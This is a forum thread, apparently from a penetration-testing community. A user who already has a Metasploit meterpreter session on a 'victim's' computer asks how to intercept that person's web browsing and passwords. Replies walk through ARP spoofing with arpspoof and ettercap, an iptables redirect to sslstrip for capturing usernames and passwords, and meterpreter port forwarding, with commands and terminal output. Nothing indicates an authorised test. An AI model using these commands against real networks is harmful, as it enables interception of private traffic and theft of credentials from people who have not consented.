How is your MITM attack setup, please show your method.
Here is my question.
I'm connected via a metersploit's payload (reverse tcp) to my victim's pc. Everything working well.
And i would to know if there's a way to capture internet datas from victim via the metasploit connection.
I mean, if i start ettercap and do a MITM between my attacker's pc and my victim's one, i'll only see the meterpreter datas sent, nothing with internet browsing etc (from victim)
So is something like this i can do with tcp reverse, or am i supposed to use another payload ?
Thanks for reading me
How is your MITM attack setup, please show your method.
Here is the whole attack setup:
Here we can see that payload and meterpreter are connected:
So now what i'd like to do, is using the meterpreter's tunnel to run ettercap on the remote network.
Like if would have a tunneled local network (as Hamachi does), so i could see the victim and his gateway in ettercap hosts list.
Kinda like this :
Do you think it's possible to go through the meterpreter tunnel to do this, or have i to find another way ?
So I think you should try this maybe,
edit etter.conf and uncomment the redir_command_off & redir_command_on within the linux section
Then enable IP forwarding;Code:kate /etc/etter.conf
Use arpspoof between the Victim and the Default gateway e.g.Code:echo 1 > /proc/sys/net/ipv4/ip_forward
You could then use IP tables to redirect some port 80 traffic if you wanted web traffic, the reason for the uncomment in step 1...e.g.Code:arpspoof -i wlan0/eth0 (your interface) -t (192.168.1.11 - victim IP) (192.168.1.1 - Default GW IP)
You could then use sslstrip and ettercap (sslstrip to strip the ssl connection and ettercap to get UN and PW - if that's what you wanted)Code:iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
After rereading the post, I'm wondering if you need to use this instead of arpspoof command. But I'm still not sure if this will work! (the above would be ok on the same LAN)Code:sslstrip -a -k -f ettercap -T -q -i (your interface)
Code:ettercap -T -M arp:remote
Last edited by Jimmy87; 02-01-2013 at 05:04 PM.
I still can't see the victim's computer in Ettercap.
#Payload and meterpreter are connected
#Here is the part of my etter.conf :
#The ip_forward activation command didn't workCode:#--------------- # Linux #--------------- # if you use ipchains: redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT
So i edited: "/etc/sysctl.conf" and uncommented the following line :Code:root@bt:~# cat /proc/sys/net/ipv4/ip_forward 0
And i entered your command back, which successfully worked this time.Code:# Uncomment the next line to enable packet forwarding for IPv4 #net.ipv4.ip_forward=1
So ipforward owes 1 now.
Your iptable commands were wrong (at least, it's what iptables told :l) i looked on the internet and entered this :
And i've seen your edit, so i tried :Code:iptables -t nat -A PREROUTING --dst 192.168.1.11 -p tcp --dport 80 -j REDIRECT --to-ports 10000
So itried to see my host list with "L" bind :Code:root@bt:~# ettercap -T -M arp:remote ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA Listening on eth0... (Ethernet) eth0 -> 08:00:27:0B:1E:04 192.168.1.6 255.255.255.0 SSL dissection needs a valid 'redir_command_on' script in the etter.conf file Privileges dropped to UID 65534 GID 65534... etter.dns:1 Invalid ip address etter.dns:2 Invalid ip address etter.dns:3 Invalid ip address 28 plugins 40 protocol dissectors 55 ports monitored 7587 mac vendor fingerprint 1766 tcp OS fingerprint 2183 known services FATAL: ARP poisoning needs a non empty hosts list.
It's all blank.
Then i tried to see the profiles list with "O" bind, then "R" to see the remote_hosts :
No cillected Profile !!
So i tried the "S" bind to select a specific host :
I tried to capture anyway, but i got nothing, when i opened a web page with my victim's computer, nothing was showing up on ettercap (i ran it without quiet mode)Code:================================================== 1) 192.168.1.1 2) 192.168.1.2 3) 192.168.1.6 Select an host to display (0 for all, -1 to quit): 0
And btw, sslstrip is an unknown command via the console, i'll find how to start it on BT5 =)
Thanks for your help =) and tell me if i did something wrong
Weird the ip_forward command works for me.
To get sslstrip running try;
I'm not really sure what else to suggest sorry, I can't get my head round how you'd be the man in the middle in this setup!Code:cd /pentest/web/sslstrip python setup.py install
Thanks for your help anyway!
I think i'm gonna learn more about meterpreter, because i've seen this recently :
It seems it supports port forwarding in itself, i'll search how to make it work
Ok good luck with it, post back any findings!
Ok, even with portfowarding i couldn't redirect packets going through victim's ports 80 & 443 through 43443 and 43444 of mine. (Ports open in my router btw). I've read multiple things about this, It seems that ppl only use it to make a Pivot. Anyway, here is the syntax, and the command in entered :
According to this, i entered the following commands :Code:Syntax: portfwd add –l 3389 –p 3389 –r < target host > “add” will add the port forwarding to the list, and will essentially create a tunnel for us. Please note, this tunnel will also exist outside the Metasploit console. Making it available to any terminal session. “-l 3389” is the local port that will be listening and forwarded to our target. This can be any port on your machine, as long as it’s not already being used. “-p 3389” is the destination port on our targeting host. “-r <target host>” is the our targeted system’s IP or hostname.
But still, when i'm capturing with wireshark, i only get datas from meterpreter, nothing about http packets from my victim.Code:meterpreter > portfwd add -l 43443 -p 80 -r 126.96.36.199 [*] Local TCP relay created: 0.0.0.0:43443 <-> 37.160.***.***:80 meterpreter > portfwd add -l 43444 -p 443 -r 188.8.131.52 [*] Local TCP relay created: 0.0.0.0:43444 <-> 37.160.***.***:443
I learn about how to sniff packets from the victim, with an extension called "sniffer", but if i save the pcap files, is there a way to get clear text password with them ? (if https is used)
Yeah I think you're right, I did have a look at Metasploit Unleashed and read a bit about it, I'm guessing you read the same stuff;
I'm not sure if this can help you with your pcap request, take a look if you haven't already seen this;